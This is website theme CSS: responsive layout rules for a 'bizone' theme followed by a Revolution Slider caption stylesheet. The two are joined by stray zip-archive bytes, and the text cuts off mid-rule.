  .navbar-default .navbar-nav > li > a, #navigation.affix  .navbar-default .navbar-nav > li > a {
	  padding: 10px 0;
	}
   ul.top-right, #navigation.affix ul.top-right{
		margin:0;
		position:relative;
		right:37px;
		margin-top:-2px;
	}
	ul.top-right, #navigation.affix ul.top-right{
		top:14px;
	}
	.navbar-default.social .navbar-toggle {
     right: -100px !important;
  }
  .main-button { top: 10px;}
	  .push_nav_brand {
	  margin: 12px 0 30px 15px;
	  width:90;
  }
  .push_nav li a {
  font-size:12px;
  padding: 8px 15px;
}
.text-rotator {
  padding-top:80px;
}
#paralax-slider .item-content p{
  font-size:14px;
}
#paralax-slider .item-content h2 {
  font-size: 26px;
  margin-bottom:10px;
}
	#bg-paralax h1, #bg-paralax h2{
		font-size:30px;
	}
	.we-do .do-wrap,
	.thinkers .thinker-wrap{
		margin:30px 0;
	}
	#thinkers{
		padding-bottom:45px;
	}	
	.thinker-image .overlay {
	  height: 60px;
	}
	#project{ padding-top:0;}
	#responsive{
	}
	#responsive .responsive-pic > .col-md-6 > img{
	  margin-bottom: 25px;
	}
	.number-counters > .col-xs-12{
		width:50%;
	}	
	.circliful {
	  margin-bottom: 50px;
	}
	.circliful:first-child {
	  margin-left:25px;
	}
	#testinomial-slider .item p{
		font-size:14px;
		margin:0;
	}
	#testinomial-slider .owl-prev, #testinomial-slider .owl-next{
		display:none;
	}
	#publication-slider .owl-prev{
		left:10px;
	}
	#publication-slider .owl-next{
		right:10px;
	}
	#publication-slider .owl-prev, #publication-slider .owl-next{
		background:#fff;
		top:19%;
		
	}
	
	
	.circliful {
	  margin-bottom: 50px;
	  margin-left:0;
	  float:none;
	  display:inline-block
	  
	}
	.circliful:first-child {
	  margin-left: 0;
	}
	
	
	
		
}


@media screen and (min-width: 641px) and (max-width: 767px) { 

      .thinkers .col-sm-4{
		  width: 48%;
		  display:inline-block;
	  } 
	  
	 
	  
	  
	  
	  
	  
   
}




@media screen and (max-width: 480px) {
	.navbar-brand img{
		width:75%;
	}
	ul.top-right{
		top:14px;
	}
	.circliful {
	  margin-bottom: 50px;
	  position:relative;
	  left:30%;
	  margin-left:0;
	  float:none;
	  -moz-transform:translate(-50%,0);
	 -ms-transform:translate(-50%,0);
	 -webkit-transform:translate(-50%,0);
	 -o-transform:translate(-50%,0);
	  transform:translate(-50%,0);
	}
	.circliful:first-child {
	  margin-left: 0;
	}
	
	.layer-content-responsive {
		max-height:240px !important;
		overflow:hidden;
	}
}



@media screen and (max-width: 479px){
	
	#main-navigation{
		top:0;
	}
	
}

.morepost-wrap ul.pagination-list {
    margin: 0;
    padding: 0;
    width: 100%;
}
.morepost-wrap ul.pagination-list li {
    display: none;
}
.morepost-wrap ul.pagination-list li.morepost {
    display: block;
}
.morepost-wrap .pagination > li > a {
    border: medium none;
}
.morepost-wrap .pagination > li > a:focus, .morepost-wrap .pagination > li > a:hover {
    background-color: transparent;
    color: #07aaa5;
}
#itemListLeading > .itemContainer:last-child .blog-item-v3{
	padding: 0;
	border: none;
}
.pagination-list .morepost-wrap{
	border-bottom: 1px solid #d1d2d2;
	border-top: 0;
	margin-top: -70px;
	padding-bottom: 20px;
}
body.com_k2 #area-main.padding{
	padding-bottom: 70px;
}
.blog-item div.itemComments {
    background: rgba(0, 0, 0, 0) none repeat scroll 0 0;
    border: medium none;
    border-radius: 0;
    padding: 0;
}
body.com_k2 div.itemBackToTop{
	display: none;
}
body.com_k2 div.itemCommentsForm form input#submitCommentButton{
 	background: #82b440 none repeat scroll 0 0;
    border: 1px solid transparent;
    color: #fff;
    font-weight: bold;
    height: 50px;
    position: relative;
    width: 185px;
    border-radius: 0;
    padding: 0;
    margin: 0;
}
body.com_k2 div.itemCommentsForm form input#submitCommentButton:hover{
	background: #000;
}
body.com_k2 div.itemCommentsForm form span#formLog{
	margin-left: 0;
	margin-right: 0;
}
.blog-reply.media{
	margin-top: 20px;
}
#about.section-padding.btwe-offer{
	padding-top: 130px!important;
}PK!�+���(�(bizone/css/settings_old.cssnu&1i�/*-----------------------------------------------------------------------------

	-	Revolution Slider 4.1 Captions -

		Screen Stylesheet

version:   	1.4.5
date:      	27/11/13
author:		themepunch
email:     	info@themepunch.com
website:   	http://www.themepunch.com
-----------------------------------------------------------------------------*/

/*********************************************
	-	SETTINGS FOR BANNER CONTAINERS	-
**********************************************/

.tp-banner-container{
	width:100%;
	position:relative;
	padding:0;

}

.tp-banner{
	width:100%;
	position:relative;
}

.tp-banner-fullscreen-container {
		width:100%;
		position:relative;
		padding:0;
}



/*************************
	-	CAPTIONS	-
**************************/

.tp-static-layers	{	
	position:absolute; 
	z-index:505; 
	top:0px;left:
	0px;
}

.tp-hide-revslider,.tp-caption.tp-hidden-caption{	visibility:hidden !important; display:none !important}


.tp-caption { z-index:1; white-space:nowrap}
.tp-caption-demo .tp-caption	{	position:relative !important; display:inline-block; margin-bottom:10px; margin-right:20px !important}


.tp-caption.whitedivider3px {

	color: #000000;
	text-shadow: none;
	background-color: rgb(255, 255, 255);
	background-color: rgba(255, 255, 255, 1);
	text-decoration: none;
	min-width: 408px;
	min-height: 3px;
	background-position: initial initial;
	background-repeat: initial initial;
	border-width: 0px;
	border-color: #000000;
	border-style: none;
}


.tp-caption.finewide_large_white {
	color:#ffffff;
	text-shadow:none;
	font-size:60px;
	line-height:60px;
	font-weight:300;
	font-family:"Open Sans", sans-serif;
	background-color:transparent;
	text-decoration:none;
	text-transform:uppercase;
	letter-spacing:8px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.whitedivider3px {
	color:#000000;
	text-shadow:none;
	background-color:rgb(255, 255, 255);
	background-color:rgba(255, 255, 255, 1);
	text-decoration:none;
	font-size:0px;
	line-height:0;
	min-width:468px;
	min-height:3px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.finewide_medium_white {
	color:#ffffff;
	text-shadow:none;
	font-size:37px;
	line-height:37px;
	font-weight:300;
	font-family:"Open Sans", sans-serif;
	background-color:transparent;
	text-decoration:none;
	text-transform:uppercase;
	letter-spacing:5px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.boldwide_small_white {
	font-size:25px;
	line-height:25px;
	font-weight:800;
	font-family:"Open Sans", sans-serif;
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:transparent;
	text-shadow:none;
	text-transform:uppercase;
	letter-spacing:5px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.whitedivider3px_vertical {
	color:#000000;
	text-shadow:none;
	background-color:rgb(255, 255, 255);
	background-color:rgba(255, 255, 255, 1);
	text-decoration:none;
	font-size:0px;
	line-height:0;
	min-width:3px;
	min-height:130px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.finewide_small_white {
	color:#ffffff;
	text-shadow:none;
	font-size:25px;
	line-height:25px;
	font-weight:300;
	font-family:"Open Sans", sans-serif;
	background-color:transparent;
	text-decoration:none;
	text-transform:uppercase;
	letter-spacing:5px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.finewide_verysmall_white_mw {
	font-size:13px;
	line-height:25px;
	font-weight:400;
	font-family:"Open Sans", sans-serif;
	color:#ffffff;
	text-decoration:none;
	background-color:transparent;
	text-shadow:none;
	text-transform:uppercase;
	letter-spacing:5px;
	max-width:470px;
	white-space:normal !important;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.lightgrey_divider {
	text-decoration:none;
	background-color:rgb(235, 235, 235);
	background-color:rgba(235, 235, 235, 1);
	width:370px;
	height:3px;
	background-position:initial initial;
	background-repeat:initial initial;
	border-width:0px;
	border-color:rgb(34, 34, 34);
	border-style:none;
}

.tp-caption.finewide_large_white {
	color: #FFF;
	text-shadow: none;
	font-size: 60px;
	line-height: 60px;
	font-weight: 300;
	font-family: "Open Sans", sans-serif;
	background-color: rgba(0, 0, 0, 0);
	text-decoration: none;
	text-transform: uppercase;
	letter-spacing: 8px;
	border-width: 0px;
	border-color: #000;
	border-style: none;
}

.tp-caption.finewide_medium_white {
	color: #FFF;
	text-shadow: none;
	font-size: 34px;
	line-height: 34px;
	font-weight: 300;
	font-family: "Open Sans", sans-serif;
	background-color: rgba(0, 0, 0, 0);
	text-decoration: none;
	text-transform: uppercase;
	letter-spacing: 5px;
	border-width: 0px;
	border-color: #000;
	border-style: none;
}

.tp-caption.huge_red {
	position:absolute;
	color:rgb(223,75,107);
	font-weight:400;
	font-size:150px;
	line-height:130px;
	font-family: 'Oswald', sans-serif;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
	background-color:rgb(45,49,54);
	padding:0px;
}

.tp-caption.middle_yellow {
	position:absolute;
	color:rgb(251,213,114);
	font-weight:600;
	font-size:50px;
	line-height:50px;
	font-family: 'Open Sans', sans-serif;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.huge_thin_yellow {
	position:absolute;
	color:rgb(251,213,114);
	font-weight:300;
	font-size:90px;
	line-height:90px;
	font-family: 'Open Sans', sans-serif;
	margin:0px;
	letter-spacing: 20px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.big_dark {
	position:absolute;
	color:#333;
	font-weight:700;
	font-size:70px;
	line-height:70px;
	font-family:"Open Sans";
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.medium_dark {
	position:absolute;
	color:#333;
	font-weight:300;
	font-size:40px;
	line-height:40px;
	font-family:"Open Sans";
	margin:0px;
	letter-spacing: 5px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}


.tp-caption.medium_grey {
	position:absolute;
	color:#fff;
	text-shadow:0px 2px 5px rgba(0, 0, 0, 0.5);
	font-weight:700;
	font-size:20px;
	line-height:20px;
	font-family:Arial;
	padding:2px 4px;
	margin:0px;
	border-width:0px;
	border-style:none;
	background-color:#888;
	white-space:nowrap;
}

.tp-caption.small_text {
	position:absolute;
	color:#fff;
	text-shadow:0px 2px 5px rgba(0, 0, 0, 0.5);
	font-weight:700;
	font-size:14px;
	line-height:20px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.medium_text {
	position:absolute;
	color:#fff;
	text-shadow:0px 2px 5px rgba(0, 0, 0, 0.5);
	font-weight:700;
	font-size:20px;
	line-height:20px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}


.tp-caption.large_bold_white_25 {
	font-size:55px;
	line-height:65px;
	font-weight:700;
	font-family:"Open Sans";
	color:#fff;
	text-decoration:none;
	background-color:transparent;
	text-align:center;
	text-shadow:#000 0px 5px 10px;
	border-width:0px;
	border-color:rgb(255, 255, 255);
	border-style:none;
}

.tp-caption.medium_text_shadow {
	font-size:25px;
	line-height:25px;
	font-weight:600;
	font-family:"Open Sans";
	color:#fff;
	text-decoration:none;
	background-color:transparent;
	text-align:center;
	text-shadow:#000 0px 5px 10px;
	border-width:0px;
	border-color:rgb(255, 255, 255);
	border-style:none;
}

.tp-caption.large_text {
	position:absolute;
	color:#fff;
	text-shadow:0px 2px 5px rgba(0, 0, 0, 0.5);
	font-weight:700;
	font-size:40px;
	line-height:40px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.medium_bold_grey {
	font-size:30px;
	line-height:30px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(102, 102, 102);
	text-decoration:none;
	background-color:transparent;
	text-shadow:none;
	margin:0px;
	padding:1px 4px 0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.very_large_text {
	position:absolute;
	color:#fff;
	text-shadow:0px 2px 5px rgba(0, 0, 0, 0.5);
	font-weight:700;
	font-size:60px;
	line-height:60px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
	letter-spacing:-2px;
}

.tp-caption.very_big_white {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:800;
	font-size:60px;
	line-height:60px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
	padding:0px 4px;
	padding-top:1px;
	background-color:#000;
}

.tp-caption.very_big_black {
	position:absolute;
	color:#000;
	text-shadow:none;
	font-weight:700;
	font-size:60px;
	line-height:60px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
	padding:0px 4px;
	padding-top:1px;
	background-color:#fff;
}

.tp-caption.modern_medium_fat {
	position:absolute;
	color:#000;
	text-shadow:none;
	font-weight:800;
	font-size:24px;
	line-height:20px;
	font-family:"Open Sans", sans-serif;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.modern_medium_fat_white {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:800;
	font-size:24px;
	line-height:20px;
	font-family:"Open Sans", sans-serif;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.modern_medium_light {
	position:absolute;
	color:#000;
	text-shadow:none;
	font-weight:300;
	font-size:24px;
	line-height:20px;
	font-family:"Open Sans", sans-serif;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.modern_big_bluebg {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:800;
	font-size:30px;
	line-height:36px;
	font-family:"Open Sans", sans-serif;
	padding:3px 10px;
	margin:0px;
	border-width:0px;
	border-style:none;
	background-color:#4e5b6c;
	letter-spacing:0;
}

.tp-caption.modern_big_redbg {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:300;
	font-size:30px;
	line-height:36px;
	font-family:"Open Sans", sans-serif;
	padding:3px 10px;
	padding-top:1px;
	margin:0px;
	border-width:0px;
	border-style:none;
	background-color:#de543e;
	letter-spacing:0;
}

.tp-caption.modern_small_text_dark {
	position:absolute;
	color:#555;
	text-shadow:none;
	font-size:14px;
	line-height:22px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.boxshadow {
	-moz-box-shadow:0px 0px 20px rgba(0, 0, 0, 0.5);
	-webkit-box-shadow:0px 0px 20px rgba(0, 0, 0, 0.5);
	box-shadow:0px 0px 20px rgba(0, 0, 0, 0.5);
}

.tp-caption.black {
	color:#000;
	text-shadow:none;
}

.tp-caption.noshadow {
	text-shadow:none;
}
/*.tp-caption a {
	-webkit-transition:all 0.2s ease-out;
	-moz-transition:all 0.2s ease-out;
	-o-transition:all 0.2s ease-out;
	-ms-transition:all 0.2s ease-out;
}

.tp-caption a:hover{
}*/

.tp-caption.thinheadline_dark {
	position:absolute;
	color:rgba(0,0,0,0.85);
	text-shadow:none;
	font-weight:300;
	font-size:30px;
	line-height:30px;
	font-family:"Open Sans";
	background-color:transparent;
}

.tp-caption.thintext_dark {
	position:absolute;
	color:rgba(0,0,0,0.85);
	text-shadow:none;
	font-weight:300;
	font-size:16px;
	line-height:26px;
	font-family:"Open Sans";
	background-color:transparent;
}

.tp-caption.medium_bg_red a {
	color: #fff;
    text-decoration: none;
}

.tp-caption.medium_bg_red a:hover {
	color: #fff;
    text-decoration: underline;
}

.tp-caption.smoothcircle {
	font-size:30px;
	line-height:75px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(0, 0, 0);
	background-color:rgba(0, 0, 0, 0.498039);
	padding:50px 25px;
	text-align:center;
	border-radius:500px 500px 500px 500px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.largeblackbg {
	font-size:50px;
	line-height:70px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(0, 0, 0);
	padding:0px 20px 5px;
	text-shadow:none;
	border-width:0px;
	border-color:rgb(255, 255, 255);
	border-style:none;
}

.tp-caption.largepinkbg {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:300;
	font-size:50px;
	line-height:70px;
	font-family:"Open Sans";
	background-color:#db4360;
	padding:0px 20px;
	-webkit-border-radius:0px;
	-moz-border-radius:0px;
	border-radius:0px;
}

.tp-caption.largewhitebg {
	position:absolute;
	color:#000;
	text-shadow:none;
	font-weight:300;
	font-size:50px;
	line-height:70px;
	font-family:"Open Sans";
	background-color:#fff;
	padding:0px 20px;
	-webkit-border-radius:0px;
	-moz-border-radius:0px;
	border-radius:0px;
}

.tp-caption.largegreenbg {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:300;
	font-size:50px;
	line-height:70px;
	font-family:"Open Sans";
	background-color:#67ae73;
	padding:0px 20px;
	-webkit-border-radius:0px;
	-moz-border-radius:0px;
	border-radius:0px;
}

.tp-caption.excerpt {
	font-size:36px;
	line-height:36px;
	font-weight:700;
	font-family:Arial;
	color:#ffffff;
	text-decoration:none;
	background-color:rgba(0, 0, 0, 1);
	text-shadow:none;
	margin:0px;
	letter-spacing:-1.5px;
	padding:1px 4px 0px 4px;
	width:150px;
	white-space:normal !important;
	height:auto;
	border-width:0px;
	border-color:rgb(255, 255, 255);
	border-style:none;
}

.tp-caption.large_bold_grey {
	font-size:60px;
	line-height:60px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(102, 102, 102);
	text-decoration:none;
	background-color:transparent;
	text-shadow:none;
	margin:0px;
	padding:1px 4px 0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_thin_grey {
	font-size:34px;
	line-height:30px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(102, 102, 102);
	text-decoration:none;
	background-color:transparent;
	padding:1px 4px 0px;
	text-shadow:none;
	margin:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.small_thin_grey {
	font-size:18px;
	line-height:26px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(117, 117, 117);
	text-decoration:none;
	background-color:transparent;
	padding:1px 4px 0px;
	text-shadow:none;
	margin:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.lightgrey_divider {
	text-decoration:none;
	background-color:rgba(235, 235, 235, 1);
	width:370px;
	height:3px;
	background-position:initial initial;
	background-repeat:initial initial;
	border-width:0px;
	border-color:rgb(34, 34, 34);
	border-style:none;
}

.tp-caption.large_bold_darkblue {
	font-size:58px;
	line-height:60px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(52, 73, 94);
	text-decoration:none;
	background-color:transparent;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bg_darkblue {
	font-size:20px;
	line-height:20px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(52, 73, 94);
	padding:10px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bold_red {
	font-size:24px;
	line-height:30px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(227, 58, 12);
	text-decoration:none;
	background-color:transparent;
	padding:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_light_red {
	font-size:21px;
	line-height:26px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(227, 58, 12);
	text-decoration:none;
	background-color:transparent;
	padding:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bg_red {
	font-size:20px;
	line-height:20px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(227, 58, 12);
	padding:10px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bold_orange {
	font-size:24px;
	line-height:30px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(243, 156, 18);
	text-decoration:none;
	background-color:transparent;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bg_orange {
	font-size:20px;
	line-height:20px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(243, 156, 18);
	padding:10px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.grassfloor {
	text-decoration:none;
	background-color:rgba(160, 179, 151, 1);
	width:4000px;
	height:150px;
	border-width:0px;
	border-color:rgb(34, 34, 34);
	border-style:none;
}

.tp-caption.large_bold_white {
	font-size:58px;
	line-height:60px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:transparent;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_light_white {
	font-size:30px;
	line-height:36px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:transparent;
	padding:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.mediumlarge_light_white {
	font-size:34px;
	line-height:40px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:transparent;
	padding:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.mediumlarge_light_white_center {
	font-size:34px;
	line-height:40px;
	font-weight:300;
	font-family:"Open Sans";
	color:#ffffff;
	text-decoration:none;
	background-color:transparent;
	padding:0px 0px 0px 0px;
	text-align:center;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bg_asbestos {
	font-size:20px;
	line-height:20px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(127, 140, 141);
	padding:10px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_light_black {
font-size:30px;
line-height:36px;
font-weight:300;
font-family:"Open Sans";
color:rgb(0, 0, 0);
text-decoration:none;
background-color:transparent;
padding:0px;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}

.tp-caption.large_bold_black {
font-size:58px;
line-height:60px;
font-weight:800;
font-family:"Open Sans";
color:rgb(0, 0, 0);
text-decoration:none;
background-color:transparent;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}

.tp-caption.mediumlarge_light_darkblue {
font-size:34px;
line-height:40px;
font-weight:300;
font-family:"Open Sans";
color:rgb(52, 73, 94);
text-decoration:none;
background-color:transparent;
padding:0px;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}

.tp-caption.small_light_white {
font-size:17px;
line-height:28px;
font-weight:300;
font-family:"Open Sans";
color:rgb(255, 255, 255);
text-decoration:none;
background-color:transparent;
padding:0px;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}

.tp-caption.roundedimage {
border-width:0px;
border-color:rgb(34, 34, 34);
border-style:none;
}

.tp-caption.large_bg_black {
font-size:40px;
line-height:40px;
font-weight:800;
font-family:"Open Sans";
color:rgb(255, 255, 255);
text-decoration:none;
background-color:rgb(0, 0, 0);
padding:10px 20px 15px;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}

.tp-caption.mediumwhitebg {
font-size:30px;
line-height:30px;
font-weight:300;
font-family:"Open Sans";
color:rgb(0, 0, 0);
text-decoration:none;
background-color:rgb(255, 255, 255);
padding:5px 15px 10px;
text-shadow:none;
border-width:0px;
border-color:rgb(0, 0, 0);
border-style:none;
}

.tp-caption.medium_bg_orange_new1 {
font-size:20px;
line-height:20px;
font-weight:800;
font-family:"Open Sans";
color:rgb(255, 255, 255);
text-decoration:none;
background-color:rgb(243, 156, 18);
padding:10px;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}



.tp-caption.boxshadow{
		-moz-box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.5);
		-webkit-box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.5);
		box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.5);
	}

.tp-caption.black{
		color: #000;
		text-shadow: none;
		font-weight: 300;
		font-size: 19px;
		line-height: 19px;
		font-family: 'Open Sans', sans;
	}

.tp-caption.noshadow {
		text-shadow: none;
	}


.tp_inner_padding	{	box-sizing:border-box;
						-webkit-box-sizing:border-box;
						-moz-box-sizing:border-box;
						max-height:none !important;	}


/*.tp-caption			{	transform:none !important}*/


/*********************************
	-	SPECIAL TP CAPTIONS -
**********************************/
.tp-caption .frontcorner		{
										width: 0;
										height: 0;
										border-left: 40px solid transparent;
										border-right: 0px solid transparent;
										border-top: 40px solid #00A8FF;
										position: absolute;left:-40px;top:0px;
									}

.tp-caption .backcorner		{
										width: 0;
										height: 0;
										border-left: 0px solid transparent;
										border-right: 40px solid transparent;
										border-bottom: 40px solid #00A8FF;
										position: absolute;right:0px;top:0px;
									}

.tp-caption .frontcornertop		{
										width: 0;
										height: 0;
										border-left: 40px solid transparent;
										border-right: 0px solid transparent;
										border-bottom: 40px solid #00A8FF;
										position: absolute;left:-40px;top:0px;
									}

.tp-caption .backcornertop		{
										width: 0;
										height: 0;
										border-left: 0px solid transparent;
										border-right: 40px solid transparent;
										border-top: 40px solid #00A8FF;
										position: absolute;right:0px;top:0px;
									}

/******************************
	-	BUTTONS	-
*******************************/

.tp-simpleresponsive .button				{	padding:6px 13px 5px; border-radius: 3px; -moz-border-radius: 3px; -webkit-border-radius: 3px; height:30px;
												cursor:pointer;
												color:#fff !important; text-shadow:0px 1px 1px rgba(0, 0, 0, 0.6) !important; font-size:15px; line-height:45px !important;
												background:url(../images/gradient/g30.png) repeat-x top; font-family: arial, sans-serif; font-weight: bold; letter-spacing: -1px;
											}

.tp-simpleresponsive  .button.big			{	color:#fff; text-shadow:0px 1px 1px rgba(0, 0, 0, 0.6); font-weight:bold; padding:9px 20px; font-size:19px;  line-height:57px !important; background:url(../images/gradient/g40.png) repeat-x top}


.tp-simpleresponsive  .purchase:hover,
.tp-simpleresponsive  .button:hover,
.tp-simpleresponsive  .button.big:hover		{	background-position:bottom, 15px 11px}



	@media only screen and (min-width: 768px) and (max-width: 959px) {

	 }



	@media only screen and (min-width: 480px) and (max-width: 767px) {
		.tp-simpleresponsive  .button	{	padding:4px 8px 3px; line-height:25px !important; font-size:11px !important;font-weight:normal;	}
		.tp-simpleresponsive  a.button { -webkit-transition: none; -moz-transition: none; -o-transition: none; -ms-transition: none;	 }


	}

    @media only screen and (min-width: 0px) and (max-width: 479px) {
		.tp-simpleresponsive  .button	{	padding:2px 5px 2px; line-height:20px !important; font-size:10px !important}
		.tp-simpleresponsive  a.button { -webkit-transition: none; -moz-transition: none; -o-transition: none; -ms-transition: none;	 }
	}





/*	BUTTON COLORS	*/



.tp-simpleresponsive  .button.green, .tp-simpleresponsive  .button:hover.green,
.tp-simpleresponsive  .purchase.green, .tp-simpleresponsive  .purchase:hover.green			{ background-color:#21a117; -webkit-box-shadow:  0px 3px 0px 0px #104d0b;        -moz-box-shadow:   0px 3px 0px 0px #104d0b;        box-shadow:   0px 3px 0px 0px #104d0b;  }


.tp-simpleresponsive  .button.blue, .tp-simpleresponsive  .button:hover.blue,
.tp-simpleresponsive  .purchase.blue, .tp-simpleresponsive  .purchase:hover.blue			{ background-color:#1d78cb; -webkit-box-shadow:  0px 3px 0px 0px #0f3e68;        -moz-box-shadow:   0px 3px 0px 0px #0f3e68;        box-shadow:   0px 3px 0px 0px #0f3e68}


.tp-simpleresponsive  .button.red, .tp-simpleresponsive  .button:hover.red,
.tp-simpleresponsive  .purchase.red, .tp-simpleresponsive  .purchase:hover.red				{ background-color:#cb1d1d; -webkit-box-shadow:  0px 3px 0px 0px #7c1212;        -moz-box-shadow:   0px 3px 0px 0px #7c1212;        box-shadow:   0px 3px 0px 0px #7c1212}

.tp-simpleresponsive  .button.orange, .tp-simpleresponsive  .button:hover.orange,
.tp-simpleresponsive  .purchase.orange, .tp-simpleresponsive  .purchase:hover.orange		{ background-color:#ff7700; -webkit-box-shadow:  0px 3px 0px 0px #a34c00;        -moz-box-shadow:   0px 3px 0px 0px #a34c00;        box-shadow:   0px 3px 0px 0px #a34c00}

.tp-simpleresponsive  .button.darkgrey, .tp-simpleresponsive  .button.grey,
.tp-simpleresponsive  .button:hover.darkgrey, .tp-simpleresponsive  .button:hover.grey,
.tp-simpleresponsive  .purchase.darkgrey, .tp-simpleresponsive  .purchase:hover.darkgrey	{ background-color:#555; -webkit-box-shadow:  0px 3px 0px 0px #222;        -moz-box-shadow:   0px 3px 0px 0px #222;        box-shadow:   0px 3px 0px 0px #222}

.tp-simpleresponsive  .button.lightgrey, .tp-simpleresponsive  .button:hover.lightgrey,
.tp-simpleresponsive  .purchase.lightgrey, .tp-simpleresponsive  .purchase:hover.lightgrey	{ background-color:#888; -webkit-box-shadow:  0px 3px 0px 0px #555;        -moz-box-shadow:   0px 3px 0px 0px #555;        box-shadow:   0px 3px 0px 0px #555}



/****************************************************************

	-	SET THE ANIMATION EVEN MORE SMOOTHER ON ANDROID   -

******************************************************************/

/*.tp-simpleresponsive				{	-webkit-perspective: 1500px;
										-moz-perspective: 1500px;
										-o-perspective: 1500px;
										-ms-perspective: 1500px;
										perspective: 1500px;
									}*/




/**********************************************
	-	FULLSCREEN AND FULLWIDHT CONTAINERS	-
**********************************************/

.fullscreen-container {
		width:100%;
		position:relative;
		padding:0;
}



.fullwidthbanner-container{
	width:100%;
	position:relative;
	padding:0;
	overflow:hidden;
}

.fullwidthbanner-container .fullwidthbanner{
